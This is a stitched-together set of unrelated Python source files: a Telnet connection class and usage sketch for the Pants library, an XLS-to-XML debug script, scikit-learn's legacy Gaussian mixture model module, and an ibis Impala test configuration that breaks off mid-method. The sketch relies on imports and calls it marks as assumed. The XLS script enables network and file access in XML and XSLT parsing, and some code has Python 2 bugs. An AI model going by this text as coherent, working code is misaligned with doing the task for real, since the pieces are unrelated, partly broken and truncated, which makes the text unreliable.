TelnetConnection object is capable of identifying and extracting Telnet command sequences from incoming data. Upon identifying a Telnet command, option or subnegotiation, the connection will call a relevant placeholder method. This class should be subclassed to provide functionality for individual commands and options. """ def __init__(self, **kwargs): Stream.__init__(self, **kwargs) # Initialize Stuff self._telnet_data = "" ##### Public Event Handlers ############################################### def on_command(self, command): """ Placeholder. Called when the connection receives a telnet command, such as AYT (Are You There). ========= ============ Argument Description ========= ============ command The byte representing the telnet command. ========= ============ """ pass def on_option(self, command, option): """ Placeholder. Called when the connection receives a telnet option negotiation sequence, such as IAC WILL ECHO. ========= ============ Argument Description ========= ============ command The byte representing the telnet command. option The byte representing the telnet option being negotiated. ========= ============ """ pass def on_subnegotiation(self, option, data): """ Placeholder. Called when the connection receives a subnegotiation sequence. 
========= ============ Argument Description ========= ============ option The byte representing the telnet option for which subnegotiation data has been received. data The received data. ========= ============ """ pass ##### Internal Telnet State Processing #################################### def _on_telnet_data(self, data): self._telnet_data += data while self._telnet_data: delimiter = self.read_delimiter if delimiter is None: data = self._telnet_data self._telnet_data = '' self._safely_call(self.on_read, data) elif isinstance(delimiter, (int, long)): if len(self._telnet_data) < delimiter: break data = self._telnet_data[:delimiter] self._telnet_data = self._telnet_data[delimiter:] self._safely_call(self.on_read, data) elif isinstance(delimiter, basestring): mark = self._telnet_data.find(delimiter) if mark == -1: break data = self._telnet_data[:mark] self._telnet_data = self._telnet_data[mark + len(delimiter):] self._safely_call(self.on_read, data) elif isinstance(delimiter, Struct): # Weird. Why are you using Struct in telnet? Silly person. if len(self._telnet_data) < delimiter.size: break data = self._telnet_data[:delimiter.size] self._telnet_data = self._telnet_data[delimiter.size:] try: data = delimiter.unpack(data) except struct.error: log.exception("Unable to unpack data on %r." % self) self.close() break self._safely_call(self.on_read, *data) elif isinstance(delimiter, _NetStruct): # Ditto for NetStruct. if not self._netstruct_iter: # We need to get started. self._netstruct_iter = delimiter.iter_unpack() self._netstruct_needed = next(self._netstruct_iter) if len(self._telnet_data) < self._netstruct_needed: break data = self._netstruct_iter.send( self._telnet_data[:self._netstruct_needed]) self._telnet_data = self._telnet_data[self._netstruct_needed:] if isinstance(data, (int,long)): self._netstruct_needed = data continue # Still here? Then we've got our object. Delete the NetStruct # state and send the data. self._netstruct_needed = None self._netstruct_iter = None self._safely_call(self.on_read, *data) elif isinstance(delimiter, RegexType): # Depending on regex_search, we could do this two ways. if self.regex_search: match = delimiter.search(self._telnet_data) if not match: break data = self._telnet_data[:match.start()] self._telnet_data = self._telnet_data[match.end():] else: data = delimiter.match(self._telnet_data) if not data: break self._telnet_data = self._telnet_data[data.end():] self._safely_call(self.on_read, data) else: log.warning("Invalid read_delimiter on %r." % self) break if self._closed or not self.connected: break def _on_telnet_iac(self, data): if len(data) < 2: return False elif data[1] == IAC: # It's an escaped IAC byte. Send it to the data buffer. self._on_telnet_data(IAC) return data[2:] elif data[1] in '\xFB\xFC\xFD\xFE': if len(data) < 3: return False self._safely_call(self.on_option, data[1], data[2]) return data[3:] elif data[1] == SB: seq = '' code = data[2:] data = data[3:] if not data: return False while data: loc = data.find(IAC) if loc == -1: return False seq += data[:loc] if data[loc + 1] == SE: # Match data = data[loc+2:] break elif data[loc + 1] == IAC: # Escaped seq += IAC data = data[loc+2:] continue # Unknown. Skip it. data = data[loc + 1:] if not data: return False self._safely_call(self.on_subnegotiation, code, seq) # Still here? It must just be a command then. Send it on. 
self._safely_call(self.on_command, data[1]) return data[2:] ##### Internal Processing Methods ######################################### def _process_recv_buffer(self): """ Completely replace the standard recv buffer processing with a custom function for optimal telnet performance. """ while self._recv_buffer: loc = self._recv_buffer.find(IAC) if loc == -1: self._on_telnet_data(self._recv_buffer) self._recv_buffer = '' break elif loc > 0: self._on_telnet_data(self._recv_buffer[:loc]) self._recv_buffer = self._recv_buffer[loc:] out = self._on_telnet_iac(self._recv_buffer) if out is False: break self._recv_buffer = out ############################################################################### # TelnetServer Class ############################################################################### class TelnetServer(Server): """ A basic implementation of a Telnet server. """ ConnectionClass = TelnetConnection
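# -----------------------------------------------------------------------------
# Hedged usage sketch (not part of the library): TelnetConnection is intended
# to be subclassed, overriding the placeholder handlers defined above.  The
# "telnet" import path, the listen() wiring and the Engine.instance() call are
# assumptions about the surrounding Pants package; adapt them to the actual
# module layout and Pants version in use.
from pants import Engine  # assumed top-level export

from telnet import DO, DONT, IAC, WILL, WONT, TelnetConnection, TelnetServer  # assumed module name


class LineEchoConnection(TelnetConnection):
    def on_connect(self):
        # Read one CRLF-terminated line at a time; _on_telnet_data honours
        # read_delimiter after stripping IAC sequences.
        self.read_delimiter = "\r\n"

    def on_read(self, data):
        # Echo each received line back to the client.
        self.write(data + "\r\n")

    def on_option(self, command, option):
        # Decline every negotiation: answer DO with WONT and WILL with DONT.
        if command == DO:
            self.write(IAC + WONT + option)
        elif command == WILL:
            self.write(IAC + DONT + option)


class LineEchoServer(TelnetServer):
    ConnectionClass = LineEchoConnection


if __name__ == "__main__":
    LineEchoServer().listen(2323)   # assumed listen() signature (port only)
    Engine.instance().start()       # assumed engine entry point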
# -*- coding: utf-8 -*- # # Debug/Helper script for XLS stylesheet development # # >>> python xls2xml <XLS File> # ... converts the XLS file into XML # # >>> python xls2xml <XLS File> <XSLT Stylesheet> # ... converts the XLS file into XML and transforms it using the stylesheet # import datetime import sys from lxml import etree from xml.sax.saxutils import escape, unescape TABLE = "table" ROW = "row" COL = "col" FIELD = "field" TAG = "tag" HASHTAG = "hashtag" # ----------------------------------------------------------------------------- def xml_encode(s): if s: s = escape(s, {"'": "&apos;", '"': "&quot;"}) return s # ----------------------------------------------------------------------------- def xml_decode(s): if s: s = unescape(s, {"&apos;": "'", "&quot;": '"'}) return s # ----------------------------------------------------------------------------- def parse(source): parser = etree.XMLParser(no_network=False) result = etree.parse(source, parser) return result # ----------------------------------------------------------------------------- def s3_unicode(s, encoding="utf-8"): if type(s) is unicode: return s try: if not isinstance(s, basestring): if hasattr(s, "__unicode__"): s = unicode(s) else: try: s = unicode(str(s), encoding, "strict") except UnicodeEncodeError: if not isinstance(s, Exception): raise s = " ".join([s3_unicode(arg, encoding) for arg in s]) else: s = s.decode(encoding) except UnicodeDecodeError: if not isinstance(s, Exception): raise else: s = " ".join([s3_unicode(arg, encoding) for arg in s]) return s # ------------------------------------------------------------------------- def encode_iso_datetime(dt): dx = dt - datetime.timedelta(microseconds=dt.microsecond) return dx.isoformat() # ------------------------------------------------------------------------- def xls2tree(source, resourcename=None, extra_data=None, hashtags=None, sheet=None, rows=None, cols=None, fields=None, header_row=True): import xlrd # Shortcuts SubElement = etree.SubElement DEFAULT_SHEET_NAME = "SahanaData" # Root element root = etree.Element(TABLE) if resourcename is not None: root.set("name", resourcename) if isinstance(sheet, xlrd.sheet.Sheet): # Open work sheet passed as argument => use this s = sheet else: if hasattr(source, "read"): # Source is a stream if hasattr(source, "seek"): source.seek(0) wb = xlrd.open_workbook(file_contents=source.read(), # requires xlrd 0.7.x or higher on_demand=True) elif isinstance(source, xlrd.book.Book): # Source is an open work book wb = source else: # Unsupported source type raise RuntimeError("xls2tree: invalid source %s" % type(source)) # Find the sheet try: if isinstance(sheet, (int, long)): s = wb.sheet_by_index(sheet) elif isinstance(sheet, basestring): s = wb.sheet_by_name(sheet) elif sheet is None: if DEFAULT_SHEET_NAME in wb.sheet_names(): s = wb.sheet_by_name(DEFAULT_SHEET_NAME) else: s = wb.sheet_by_index(0) else: raise SyntaxError("xls2tree: invalid sheet %s" % sheet) except IndexError, xlrd.XLRDError: s = None def cell_range(cells, max_cells): """ Helper method to calculate a cell range @param cells: the specified range @param max_cells: maximum number of cells """ if not cells: cells = (0, max_cells) elif not isinstance(cells, (tuple, list)): cells = (0, cells) elif len(cells) == 1: cells = (cells[0], max_cells) else: cells = (cells[0], cells[0] + cells[1]) return cells if s: # Calculate cell range rows = cell_range(rows, s.nrows) cols = cell_range(cols, s.ncols) # Column headers if fields: headers = fields elif not header_row: headers = dict((i, 
"%s" % i) for i in range(cols[1]- cols[0])) else: # Use header row in the work sheet headers = {} # Lambda to decode XLS dates into an ISO datetime-string decode_date = lambda v: datetime.datetime(*xlrd.xldate_as_tuple(v, wb.datemode)) def decode(t, v): """ Helper method to decode the cell value by type @param t: the cell type @param v: the cell value @return: text representation of the cell value """ text = "" if v: if t is None: text = s3_unicode(v).strip() elif t == xlrd.XL_CELL_TEXT: text = v.strip() elif t == xlrd.XL_CELL_NUMBER: text = str(long(v)) if long(v) == v else str(v) elif t == xlrd.XL_CELL_DATE: text = encode_iso_datetime(decode_date(v)) elif t == xlrd.XL_CELL_BOOLEAN: text = str(value).lower() return text def add_col(row, name, t, v, hashtags=None): """ Helper method to add a column to an output row @param row: the output row (etree.Element) @param name: the column name @param t: the cell type @param v: the cell value """ col = SubElement(row, COL) col.set(FIELD, name) if hashtags: hashtag = hashtags.get(name) if hashtag and hashtag[1:]: col.set(HASHTAG, hashtag) col.text = decode(t, v) hashtags = dict(hashtags) if hashtags else {} # Process the rows record_idx = 0 extra_fields = set(extra_data) if extra_data else None check_headers = extra_fields is not None for ridx in range(*rows): # Read types and values types = s.row_types(ridx, *cols) values = s.row_values(ridx, *cols) # Skip empty rows if not any(v != "" for v in values): continue if header_row and record_idx == 0: # Read column headers if not fields: for cidx, value in enumerate(values): header = decode(types[cidx], value) headers[cidx] = header if check_headers: extra_fields.discard(header) check_headers = False else: if not fields and \ (header_row and record_idx == 1 or record_idx == 0): # Autodetect hashtags items = {} for cidx, name in headers.items(): try: t = types[cidx] v = values[cidx] except IndexError: continue if t not in (xlrd.XL_CELL_TEXT, xlrd.XL_CELL_EMPTY): items = None break elif v: items[name] = v if items and all(v[0] == '#' for v in items.values()): hashtags.update(items) continue # Add output row orow = SubElement(root, ROW) for cidx, name in headers.items(): if check_headers: extra_fields.discard(name) try: t = types[cidx] v = values[cidx] except IndexError: pass else: add_col(orow, name, t, v, hashtags=hashtags) check_headers = False # Add extra data if extra_fields: for key in extra_fields: add_col(orow, key, None, extra_data[key], hashtags=hashtags) record_idx += 1 return etree.ElementTree(root) # ----------------------------------------------------------------------------- def transform(tree, stylesheet_path, **args): if args: _args = [(k, "'%s'" % args[k]) for k in args] _args = dict(_args) else: _args = None stylesheet = etree.parse(stylesheet_path) ac = etree.XSLTAccessControl(read_file=True, read_network=True) transformer = etree.XSLT(stylesheet, access_control=ac) if _args: result = transformer(tree, **_args) else: result = transformer(tree) return result # ----------------------------------------------------------------------------- def main(argv): try: xlspath = argv[0] except: sys.stderr.write("Usage: python xls2xml.py <XLS File> [<XSLT Stylesheet>]\n") return try: xslpath = argv[1] except: xslpath = None xlsfile = open(xlspath) tree = xls2tree(xlsfile) if xslpath is not None: tree = transform(tree, xslpath) sys.stdout.write(etree.tostring(tree, pretty_print=True)) if __name__ == "__main__": sys.exit(main(sys.argv[1:])) # END 
""" Gaussian Mixture Models. This implementation corresponds to frequentist (non-Bayesian) formulation of Gaussian Mixture Models. """ # Author: Ron Weiss <ronweiss@gmail.com> # Fabian Pedregosa <fabian.pedregosa@inria.fr> # Bertrand Thirion <bertrand.thirion@inria.fr> import numpy as np from scipy import linalg from ..base import BaseEstimator from ..utils import check_random_state from ..utils.extmath import logsumexp, pinvh from .. import cluster from sklearn.externals.six.moves import zip EPS = np.finfo(float).eps def log_multivariate_normal_density(X, means, covars, covariance_type='diag'): """Compute the log probability under a multivariate Gaussian distribution. Parameters ---------- X : array_like, shape (n_samples, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. means : array_like, shape (n_components, n_features) List of n_features-dimensional mean vectors for n_components Gaussians. Each row corresponds to a single mean vector. covars : array_like List of n_components covariance parameters for each Gaussian. The shape depends on `covariance_type`: (n_components, n_features) if 'spherical', (n_features, n_features) if 'tied', (n_components, n_features) if 'diag', (n_components, n_features, n_features) if 'full' covariance_type : string Type of the covariance parameters. Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'. Returns ------- lpr : array_like, shape (n_samples, n_components) Array containing the log probabilities of each data point in X under each of the n_components multivariate Gaussian distributions. """ log_multivariate_normal_density_dict = { 'spherical': _log_multivariate_normal_density_spherical, 'tied': _log_multivariate_normal_density_tied, 'diag': _log_multivariate_normal_density_diag, 'full': _log_multivariate_normal_density_full} return log_multivariate_normal_density_dict[covariance_type]( X, means, covars) def sample_gaussian(mean, covar, covariance_type='diag', n_samples=1, random_state=None): """Generate random samples from a Gaussian distribution. Parameters ---------- mean : array_like, shape (n_features,) Mean of the distribution. covars : array_like, optional Covariance of the distribution. The shape depends on `covariance_type`: scalar if 'spherical', (n_features) if 'diag', (n_features, n_features) if 'tied', or 'full' covariance_type : string, optional Type of the covariance parameters. Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'. n_samples : int, optional Number of samples to generate. Defaults to 1. Returns ------- X : array, shape (n_features, n_samples) Randomly generated sample """ rng = check_random_state(random_state) n_dim = len(mean) rand = rng.randn(n_dim, n_samples) if n_samples == 1: rand.shape = (n_dim,) if covariance_type == 'spherical': rand *= np.sqrt(covar) elif covariance_type == 'diag': rand = np.dot(np.diag(np.sqrt(covar)), rand) else: s, U = linalg.eigh(covar) s.clip(0, out=s) # get rid of tiny negatives np.sqrt(s, out=s) U *= s rand = np.dot(U, rand) return (rand.T + mean).T class GMM(BaseEstimator): """Gaussian Mixture Model Representation of a Gaussian mixture model probability distribution. This class allows for easy evaluation of, sampling from, and maximum-likelihood estimation of the parameters of a GMM distribution. Initializes parameters such that every mixture component has zero mean and identity covariance. Parameters ---------- n_components : int, optional Number of mixture components. Defaults to 1. 
covariance_type : string, optional String describing the type of covariance parameters to use. Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'. random_state: RandomState or an int seed (0 by default) A random number generator instance min_covar : float, optional Floor on the diagonal of the covariance matrix to prevent overfitting. Defaults to 1e-3. thresh : float, optional Convergence threshold. n_iter : int, optional Number of EM iterations to perform. n_init : int, optional Number of initializations to perform. the best results is kept params : string, optional Controls which parameters are updated in the training process. Can contain any combination of 'w' for weights, 'm' for means, and 'c' for covars. Defaults to 'wmc'. init_params : string, optional Controls which parameters are updated in the initialization process. Can contain any combination of 'w' for weights, 'm' for means, and 'c' for covars. Defaults to 'wmc'. Attributes ---------- weights_ : array, shape (`n_components`,) This attribute stores the mixing weights for each mixture component. means_ : array, shape (`n_components`, `n_features`) Mean parameters for each mixture component. covars_ : array Covariance parameters for each mixture component. The shape depends on `covariance_type`:: (n_components, n_features) if 'spherical', (n_features, n_features) if 'tied', (n_components, n_features) if 'diag', (n_components, n_features, n_features) if 'full' converged_ : bool True when convergence was reached in fit(), False otherwise. See Also -------- DPGMM : Infinite gaussian mixture model, using the dirichlet process, fit with a variational algorithm VBGMM : Finite gaussian mixture model fit with a variational algorithm, better for situations where there might be too little data to get a good estimate of the covariance matrix. Examples -------- >>> import numpy as np >>> from sklearn import mixture >>> np.random.seed(1) >>> g = mixture.GMM(n_components=2) >>> # Generate random observations with two modes centered on 0 >>> # and 10 to use for training. >>> obs = np.concatenate((np.random.randn(100, 1), ... 10 + np.random.randn(300, 1))) >>> g.fit(obs) # doctest: +NORMALIZE_WHITESPACE GMM(covariance_type='diag', init_params='wmc', min_covar=0.001, n_components=2, n_init=1, n_iter=100, params='wmc', random_state=None, thresh=0.01) >>> np.round(g.weights_, 2) array([ 0.75, 0.25]) >>> np.round(g.means_, 2) array([[ 10.05], [ 0.06]]) >>> np.round(g.covars_, 2) #doctest: +SKIP array([[[ 1.02]], [[ 0.96]]]) >>> g.predict([[0], [2], [9], [10]]) #doctest: +ELLIPSIS array([1, 1, 0, 0]...) >>> np.round(g.score([[0], [2], [9], [10]]), 2) array([-2.19, -4.58, -1.75, -1.21]) >>> # Refit the model on new data (initial parameters remain the >>> # same), this time with an even split between the two modes. 
>>> g.fit(20 * [[0]] + 20 * [[10]]) # doctest: +NORMALIZE_WHITESPACE GMM(covariance_type='diag', init_params='wmc', min_covar=0.001, n_components=2, n_init=1, n_iter=100, params='wmc', random_state=None, thresh=0.01) >>> np.round(g.weights_, 2) array([ 0.5, 0.5]) """ def __init__(self, n_components=1, covariance_type='diag', random_state=None, thresh=1e-2, min_covar=1e-3, n_iter=100, n_init=1, params='wmc', init_params='wmc'): self.n_components = n_components self.covariance_type = covariance_type self.thresh = thresh self.min_covar = min_covar self.random_state = random_state self.n_iter = n_iter self.n_init = n_init self.params = params self.init_params = init_params if not covariance_type in ['spherical', 'tied', 'diag', 'full']: raise ValueError('Invalid value for covariance_type: %s' % covariance_type) if n_init < 1: raise ValueError('GMM estimation requires at least one run') self.weights_ = np.ones(self.n_components) / self.n_components # flag to indicate exit status of fit() method: converged (True) or # n_iter reached (False) self.converged_ = False def _get_covars(self): """Covariance parameters for each mixture component. The shape depends on `cvtype`:: (`n_states`, 'n_features') if 'spherical', (`n_features`, `n_features`) if 'tied', (`n_states`, `n_features`) if 'diag', (`n_states`, `n_features`, `n_features`) if 'full' """ if self.covariance_type == 'full': return self.covars_ elif self.covariance_type == 'diag': return [np.diag(cov) for cov in self.covars_] elif self.covariance_type == 'tied': return [self.covars_] * self.n_components elif self.covariance_type == 'spherical': return [np.diag(cov) for cov in self.covars_] def _set_covars(self, covars): """Provide values for covariance""" covars = np.asarray(covars) _validate_covars(covars, self.covariance_type, self.n_components) self.covars_ = covars def score_samples(self, X): """Return the per-sample likelihood of the data under the model. Compute the log probability of X under the model and return the posterior distribution (responsibilities) of each mixture component for each element of X. Parameters ---------- X: array_like, shape (n_samples, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. Returns ------- logprob : array_like, shape (n_samples,) Log probabilities of each data point in X. responsibilities : array_like, shape (n_samples, n_components) Posterior probabilities of each mixture component for each observation """ X = np.asarray(X) if X.ndim == 1: X = X[:, np.newaxis] if X.size == 0: return np.array([]), np.empty((0, self.n_components)) if X.shape[1] != self.means_.shape[1]: raise ValueError('The shape of X is not compatible with self') lpr = (log_multivariate_normal_density(X, self.means_, self.covars_, self.covariance_type) + np.log(self.weights_)) logprob = logsumexp(lpr, axis=1) responsibilities = np.exp(lpr - logprob[:, np.newaxis]) return logprob, responsibilities def score(self, X): """Compute the log probability under the model. Parameters ---------- X : array_like, shape (n_samples, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. Returns ------- logprob : array_like, shape (n_samples,) Log probabilities of each data point in X """ logprob, _ = self.score_samples(X) return logprob def predict(self, X): """Predict label for data. 
Parameters ---------- X : array-like, shape = [n_samples, n_features] Returns ------- C : array, shape = (n_samples,) """ logprob, responsibilities = self.score_samples(X) return responsibilities.argmax(axis=1) def predict_proba(self, X): """Predict posterior probability of data under each Gaussian in the model. Parameters ---------- X : array-like, shape = [n_samples, n_features] Returns ------- responsibilities : array-like, shape = (n_samples, n_components) Returns the probability of the sample for each Gaussian (state) in the model. """ logprob, responsibilities = self.score_samples(X) return responsibilities def sample(self, n_samples=1, random_state=None): """Generate random samples from the model. Parameters ---------- n_samples : int, optional Number of samples to generate. Defaults to 1. Returns ------- X : array_like, shape (n_samples, n_features) List of samples """ if random_state is None: random_state = self.random_state random_state = check_random_state(random_state) weight_cdf = np.cumsum(self.weights_) X = np.empty((n_samples, self.means_.shape[1])) rand = random_state.rand(n_samples) # decide which component to use for each sample comps = weight_cdf.searchsorted(rand) # for each component, generate all needed samples for comp in range(self.n_components): # occurrences of current component in X comp_in_X = (comp == comps) # number of those occurrences num_comp_in_X = comp_in_X.sum() if num_comp_in_X > 0: if self.covariance_type == 'tied': cv = self.covars_ elif self.covariance_type == 'spherical': cv = self.covars_[comp][0] else: cv = self.covars_[comp] X[comp_in_X] = sample_gaussian( self.means_[comp], cv, self.covariance_type, num_comp_in_X, random_state=random_state).T return X def fit(self, X): """Estimate model parameters with the expectation-maximization algorithm. A initialization step is performed before entering the em algorithm. If you want to avoid this step, set the keyword argument init_params to the empty string '' when creating the GMM object. Likewise, if you would like just to do an initialization, set n_iter=0. Parameters ---------- X : array_like, shape (n, n_features) List of n_features-dimensional data points. Each row corresponds to a single data point. """ ## initialization step X = np.asarray(X, dtype=np.float) if X.ndim == 1: X = X[:, np.newaxis] if X.shape[0] < self.n_components: raise ValueError( 'GMM estimation with %s components, but got only %s samples' % (self.n_components, X.shape[0])) max_log_prob = -np.infty for _ in range(self.n_init): if 'm' in self.init_params or not hasattr(self, 'means_'): self.means_ = cluster.KMeans( n_clusters=self.n_components, random_state=self.random_state).fit(X).cluster_centers_ if 'w' in self.init_params or not hasattr(self, 'weights_'): self.weights_ = np.tile(1.0 / self.n_components, self.n_components) if 'c' in self.init_params or not hasattr(self, 'covars_'): cv = np.cov(X.T) + self.min_covar * np.eye(X.shape[1]) if not cv.shape: cv.shape = (1, 1) self.covars_ = \ distribute_covar_matrix_to_match_covariance_type( cv, self.covariance_type, self.n_components) # EM algorithms log_likelihood = [] # reset self.converged_ to False self.converged_ = False for i in range(self.n_iter): # Expectation step curr_log_likelihood, responsibilities = self.score_samples(X) log_likelihood.append(curr_log_likelihood.sum()) # Check for convergence. 
if i > 0 and abs(log_likelihood[-1] - log_likelihood[-2]) < \ self.thresh: self.converged_ = True break # Maximization step self._do_mstep(X, responsibilities, self.params, self.min_covar) # if the results are better, keep it if self.n_iter: if log_likelihood[-1] > max_log_prob: max_log_prob = log_likelihood[-1] best_params = {'weights': self.weights_, 'means': self.means_, 'covars': self.covars_} # check the existence of an init param that was not subject to # likelihood computation issue. if np.isneginf(max_log_prob) and self.n_iter: raise RuntimeError( "EM algorithm was never able to compute a valid likelihood " + "given initial parameters. Try different init parameters " + "(or increasing n_init) or check for degenerate data.") # self.n_iter == 0 occurs when using GMM within HMM if self.n_iter: self.covars_ = best_params['covars'] self.means_ = best_params['means'] self.weights_ = best_params['weights'] return self def _do_mstep(self, X, responsibilities, params, min_covar=0): """ Perform the Mstep of the EM algorithm and return the class weihgts. """ weights = responsibilities.sum(axis=0) weighted_X_sum = np.dot(responsibilities.T, X) inverse_weights = 1.0 / (weights[:, np.newaxis] + 10 * EPS) if 'w' in params: self.weights_ = (weights / (weights.sum() + 10 * EPS) + EPS) if 'm' in params: self.means_ = weighted_X_sum * inverse_weights if 'c' in params: covar_mstep_func = _covar_mstep_funcs[self.covariance_type] self.covars_ = covar_mstep_func( self, X, responsibilities, weighted_X_sum, inverse_weights, min_covar) return weights def _n_parameters(self): """Return the number of free parameters in the model.""" ndim = self.means_.shape[1] if self.covariance_type == 'full': cov_params = self.n_components * ndim * (ndim + 1) / 2. elif self.covariance_type == 'diag': cov_params = self.n_components * ndim elif self.covariance_type == 'tied': cov_params = ndim * (ndim + 1) / 2. 
elif self.covariance_type == 'spherical': cov_params = self.n_components mean_params = ndim * self.n_components return int(cov_params + mean_params + self.n_components - 1) def bic(self, X): """Bayesian information criterion for the current model fit and the proposed data Parameters ---------- X : array of shape(n_samples, n_dimensions) Returns ------- bic: float (the lower the better) """ return (-2 * self.score(X).sum() + self._n_parameters() * np.log(X.shape[0])) def aic(self, X): """Akaike information criterion for the current model fit and the proposed data Parameters ---------- X : array of shape(n_samples, n_dimensions) Returns ------- aic: float (the lower the better) """ return - 2 * self.score(X).sum() + 2 * self._n_parameters() ######################################################################### ## some helper routines ######################################################################### def _log_multivariate_normal_density_diag(X, means, covars): """Compute Gaussian log-density at X for a diagonal model""" n_samples, n_dim = X.shape lpr = -0.5 * (n_dim * np.log(2 * np.pi) + np.sum(np.log(covars), 1) + np.sum((means ** 2) / covars, 1) - 2 * np.dot(X, (means / covars).T) + np.dot(X ** 2, (1.0 / covars).T)) return lpr def _log_multivariate_normal_density_spherical(X, means, covars): """Compute Gaussian log-density at X for a spherical model""" cv = covars.copy() if covars.ndim == 1: cv = cv[:, np.newaxis] if covars.shape[1] == 1: cv = np.tile(cv, (1, X.shape[-1])) return _log_multivariate_normal_density_diag(X, means, cv) def _log_multivariate_normal_density_tied(X, means, covars): """Compute Gaussian log-density at X for a tied model""" n_samples, n_dim = X.shape icv = pinvh(covars) lpr = -0.5 * (n_dim * np.log(2 * np.pi) + np.log(linalg.det(covars) + 0.1) + np.sum(X * np.dot(X, icv), 1)[:, np.newaxis] - 2 * np.dot(np.dot(X, icv), means.T) + np.sum(means * np.dot(means, icv), 1)) return lpr def _log_multivariate_normal_density_full(X, means, covars, min_covar=1.e-7): """Log probability for full covariance matrices. 
""" n_samples, n_dim = X.shape nmix = len(means) log_prob = np.empty((n_samples, nmix)) for c, (mu, cv) in enumerate(zip(means, covars)): try: cv_chol = linalg.cholesky(cv, lower=True) except linalg.LinAlgError: # The model is most probably stuck in a component with too # few observations, we need to reinitialize this components cv_chol = linalg.cholesky(cv + min_covar * np.eye(n_dim), lower=True) cv_log_det = 2 * np.sum(np.log(np.diagonal(cv_chol))) cv_sol = linalg.solve_triangular(cv_chol, (X - mu).T, lower=True).T log_prob[:, c] = - .5 * (np.sum(cv_sol ** 2, axis=1) + n_dim * np.log(2 * np.pi) + cv_log_det) return log_prob def _validate_covars(covars, covariance_type, n_components): """Do basic checks on matrix covariance sizes and values """ from scipy import linalg if covariance_type == 'spherical': if len(covars) != n_components: raise ValueError("'spherical' covars have length n_components") elif np.any(covars <= 0): raise ValueError("'spherical' covars must be non-negative") elif covariance_type == 'tied': if covars.shape[0] != covars.shape[1]: raise ValueError("'tied' covars must have shape (n_dim, n_dim)") elif (not np.allclose(covars, covars.T) or np.any(linalg.eigvalsh(covars) <= 0)): raise ValueError("'tied' covars must be symmetric, " "positive-definite") elif covariance_type == 'diag': if len(covars.shape) != 2: raise ValueError("'diag' covars must have shape " "(n_components, n_dim)") elif np.any(covars <= 0): raise ValueError("'diag' covars must be non-negative") elif covariance_type == 'full': if len(covars.shape) != 3: raise ValueError("'full' covars must have shape " "(n_components, n_dim, n_dim)") elif covars.shape[1] != covars.shape[2]: raise ValueError("'full' covars must have shape " "(n_components, n_dim, n_dim)") for n, cv in enumerate(covars): if (not np.allclose(cv, cv.T) or np.any(linalg.eigvalsh(cv) <= 0)): raise ValueError("component %d of 'full' covars must be " "symmetric, positive-definite" % n) else: raise ValueError("covariance_type must be one of " + "'spherical', 'tied', 'diag', 'full'") def distribute_covar_matrix_to_match_covariance_type( tied_cv, covariance_type, n_components): """Create all the covariance matrices from a given template """ if covariance_type == 'spherical': cv = np.tile(tied_cv.mean() * np.ones(tied_cv.shape[1]), (n_components, 1)) elif covariance_type == 'tied': cv = tied_cv elif covariance_type == 'diag': cv = np.tile(np.diag(tied_cv), (n_components, 1)) elif covariance_type == 'full': cv = np.tile(tied_cv, (n_components, 1, 1)) else: raise ValueError("covariance_type must be one of " + "'spherical', 'tied', 'diag', 'full'") return cv def _covar_mstep_diag(gmm, X, responsibilities, weighted_X_sum, norm, min_covar): """Performing the covariance M step for diagonal cases""" avg_X2 = np.dot(responsibilities.T, X * X) * norm avg_means2 = gmm.means_ ** 2 avg_X_means = gmm.means_ * weighted_X_sum * norm return avg_X2 - 2 * avg_X_means + avg_means2 + min_covar def _covar_mstep_spherical(*args): """Performing the covariance M step for spherical cases""" cv = _covar_mstep_diag(*args) return np.tile(cv.mean(axis=1)[:, np.newaxis], (1, cv.shape[1])) def _covar_mstep_full(gmm, X, responsibilities, weighted_X_sum, norm, min_covar): """Performing the covariance M step for full cases""" # Eq. 12 from K. 
Murphy, "Fitting a Conditional Linear Gaussian # Distribution" n_features = X.shape[1] cv = np.empty((gmm.n_components, n_features, n_features)) for c in range(gmm.n_components): post = responsibilities[:, c] # Underflow Errors in doing post * X.T are not important np.seterr(under='ignore') avg_cv = np.dot(post * X.T, X) / (post.sum() + 10 * EPS) mu = gmm.means_[c][np.newaxis] cv[c] = (avg_cv - np.dot(mu.T, mu) + min_covar * np.eye(n_features)) return cv def _covar_mstep_tied(gmm, X, responsibilities, weighted_X_sum, norm, min_covar): # Eq. 15 from K. Murphy, "Fitting a Conditional Linear Gaussian n_features = X.shape[1] avg_X2 = np.dot(X.T, X) avg_means2 = np.dot(gmm.means_.T, weighted_X_sum) return (avg_X2 - avg_means2 + min_covar * np.eye(n_features)) / X.shape[0] _covar_mstep_funcs = {'spherical': _covar_mstep_spherical, 'diag': _covar_mstep_diag, 'tied': _covar_mstep_tied, 'full': _covar_mstep_full, }
from __future__ import annotations import os from pathlib import Path import pytest import ibis import ibis.expr.types as ir import ibis.util as util from ibis import options from ibis.backends.impala.compiler import ImpalaCompiler, ImpalaExprTranslator from ibis.backends.tests.base import ( BackendTest, RoundAwayFromZero, UnorderedComparator, ) from ibis.tests.expr.mocks import MockBackend class TestConf(UnorderedComparator, BackendTest, RoundAwayFromZero): supports_arrays = True supports_arrays_outside_of_select = False check_dtype = False supports_divide_by_zero = True returned_timestamp_unit = 's' @staticmethod def connect(data_directory: Path): fsspec = pytest.importorskip("fsspec") env = IbisTestEnv() return ibis.impala.connect( host=env.impala_host, port=env.impala_port, auth_mechanism=env.auth_mechanism, hdfs_client=fsspec.filesystem( env.hdfs_protocol, host=env.nn_host, port=env.hdfs_port, user=env.hdfs_user, ), database=env.test_data_db, ) def _get_original_column_names(self, tablename: str) -> list[str]: import pyarrow.parquet as pq pq_file = pq.ParquetFile( self.data_directory / "parquet" / tablename / f"{tablename}.parquet" ) return pq_file.schema.names def _get_renamed_table(self, tablename: str) -> ir.TableExpr: t = self.connection.table(tablename) original_names = self._get_original_column_names(tablename) return t.relabel(dict(zip(t.columns, original_names))) @property def batting(self) -> ir.TableExpr: return self._get_renamed_table("batting") @property def awards_players(self) -> ir.TableExpr: return self._get_renamed_table("awards_players") class IbisTestEnv: def __init__(self): if options.impala is None: ibis.backends.impala.Backend.register_options() @property def impala_host(self): return os.environ.get('IBIS_TEST_IMPALA_HOST', 'localhost') @property def impala_port(self): return 